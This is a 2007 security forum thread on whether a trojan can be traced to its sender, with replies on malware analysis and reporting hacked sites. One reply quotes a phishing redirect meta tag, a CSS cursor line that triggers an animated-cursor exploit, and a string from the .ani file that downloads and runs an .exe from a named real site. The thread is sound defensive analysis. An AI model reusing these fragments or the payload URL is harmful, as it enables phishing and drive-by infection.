can a trojan be traced back to its sender

Discussion in 'other security issues & news' started by H2O_Lover, Mar 5, 2007.

Thread Status:
Not open for further replies.
  1. H2O_Lover

    H2O_Lover Registered Member

    Joined:
    Mar 4, 2007
    Posts:
    2
    Does anyone know if a trojan virus can be traced back to its sender ? i know where i got it and how but i would love to prove it ? it was put in a pop up window that asked me for my password. My virus pretection caught it and i wrote down all the stuff, others were not as lucky. I would love to send the information needed to stop this person.

    thanks ahead of time
     
  2. Paranoid2000

    Paranoid2000 Registered Member

    Joined:
    May 2, 2004
    Posts:
    2,839
    Location:
    North West, United Kingdom
    Possibly - if you have extensive malware and disassembly skills you may be able to look a trojan's code and see similarities with other known malware. If the author(s) are real amateurs, they may include personal data like email addresses (as noted here) but anyone stupid enough to do that has likely ripped off someone else's code, not written their own.

    Another option is to let a trojan run and find out what it does and where it connects to. Most trojans use IRC (though the latest are now using P2P for communication) so they need to connect to a central server (normally one that has been broken into). Some groups (e.g. Shadowserver) specialise in tracking down and terminating such control centres. One (old) account of this type of tracking can be found at The Attacks on GRC.COM.

    In summary, it's only feasible for those with extensive technical expertise. If you lack such, then you are more likely to infect your system.

    However in your case, it may not even be a trojan but instead a webpage exploit (what did your AV identify it as?) that caused the popup. If this occurred on a legitimate site, contact the owner to let them know (if no contact details are given, use a site like DNSStuff or NWTools to look up the domain details - these should normally give an email address). However if your AV detected it, there is likely little more that you can do.
     
  3. H2O_Lover

    H2O_Lover Registered Member

    Joined:
    Mar 4, 2007
    Posts:
    2
    this is all the info i have the X's are where my name was


    file: p[1]. htm
    Trojan name: JS/Exploit-BO.gen
    file path C\Documents and settings\xxxxxxxxxxxx\LocalSettings\ Temporary Interent Files\Content.IE5\OLM3MR87

    I do know exactly where i got it, It was from a 3rd party who set up a chat room for investors using the software LiVve

    Maybe there is something in the host site. I would thinking something should show this somewhere

    again thanks for the help
     
    Last edited: Mar 5, 2007
  4. Paranoid2000

    Paranoid2000 Registered Member

    Joined:
    May 2, 2004
    Posts:
    2,839
    Location:
    North West, United Kingdom
    It's an old one then according to Network Associate's Information Page. If you still get the warning, inform the chatroom host. Otherwise it could have been posted by a visitor or a spam/IRCbot.
     
  5. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    To follow up on what Paranoid2000 suggested about analysis -

    1) you can analyze phish emails and report them. This is fun, and perhaps you can help stop the phish. While phish sites are not normally dangerous by just visiting them, a "click" on the site could trigger a trojan download, so you should have something in place to prevent remote code execution.

    I received this a few days ago:

    http://www.urs2.net/rsj/computing/tests/paypal/email.gif

    Looks like a phish. Launching to the site:

    http://www.urs2.net/rsj/computing/tests/paypal/site.gif

    Note that hovering over the "Click Here" reveals that the URL is not PayPal. Clicking on it does bring up a PayPal site, but notice that the URL is different. Hmm... must be a redirect:

    http://www.urs2.net/rsj/computing/tests/paypal/site2.gif

    Going directly to the site - it seemed to be a legitimate site, perhaps had been hacked to upload this page. I sent her an email and noticed that the file was removed shortly after that. I sent the other URL to shadowserver's efraud. Not a trojan, in this case.


    Looking in the /~ellensohn directory of the URL contained in the email reveals the "start.html" file which contains code which redirects:

    Code:
    <meta http-equiv="Refresh" content="0; URL=http://www.[removed]/file/.www.paypal.com/webscr.php?cmd=_login-run"
    
    The link no longer works. Note that the "start.html" file, instead of being a redirect, could have triggered a download via iframe or other such exploits. So, just looking at that URL in the email, you can't tell what is going to happen.

    2) Letting an exploit run. Here, as P2K cautions, you have to have protection in place.

    Last year, a trojan hijacker was found launched from several sites. I went to one using Opera, and nothing happened. Looking at the source code showed it to be the old animated cursor exploit (MS05-002),

    Code:
    style
    * {CURSOR: url("./exp_2/1.ani");}
     /style
    
    so I had to fire up IE (unpatched) to get it to run. Since the .ani file is doing the work while it shows in the status bar, the user doesn't see any reference to the .exe file which is attempting to download in the background:

    http://www.urs2.net/rsj/computing/imgs/remotecode2.gif

    Both the .ani file and .exe file had already been identified by AV:

    http://www.urs2.net/rsj/computing/imgs/remotecode-scan2.gif

    http://www.urs2.net/rsj/computing/imgs/remotecode-scan.gif


    Looking inside the animated cursor file (1.ani) to see how the download worked:
    Code:
    urlmon.dll_URLDownloadToFileA_WinExec_http://kunsthandel-scheider.de/daten/dlle.exe
    
    That web site seemed to be a legitimate site of an art collector. As above, I sent an email to the site, but heard nothing. I contacted Kevin McAleavey at nsclean.com, who sent an email in German. He also heard nothing back. We reported the site, but checking today, I see that the trojan file is still on the site. So, efforts don't always pay off, but it's still worth tracing back to the sender just in case.

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
     
Loading...
Thread Status:
Not open for further replies.